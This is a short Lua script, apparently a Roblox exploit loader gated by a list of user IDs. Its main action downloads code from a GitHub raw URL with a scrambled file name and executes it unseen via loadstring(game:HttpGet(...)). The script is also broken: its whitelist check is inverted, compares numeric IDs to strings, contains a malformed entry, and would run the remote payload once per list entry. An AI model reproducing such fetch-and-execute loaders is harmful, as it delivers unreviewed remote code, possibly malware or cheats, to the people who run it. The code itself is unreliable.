local whitelisted = {
    "275535162", --> Kin
    "1037787899", --> Shock
    "1599834573",--> Dev
    "1285777797," --> Moon
    "160458279" --> Hack
}
for _, Player in pairs(whitelisted) do
    if game.Players.LocalPlayer.UserId == Player then --> Checking if UserID is in the table
        game.Players.LocalPlayer:Kick("NOT WHITELISTED! CLOSING CLIENT IN 5 SECONDS") --> Kicking Player
        wait(5)
        game:shutdown() --> Closing client
        else
        loadstring(game:HttpGet('https://raw.githubusercontent.com/kinnny/pro/main/asdafasdwfqwmorraoylehighsaxaxwfoq'))()
    end
end
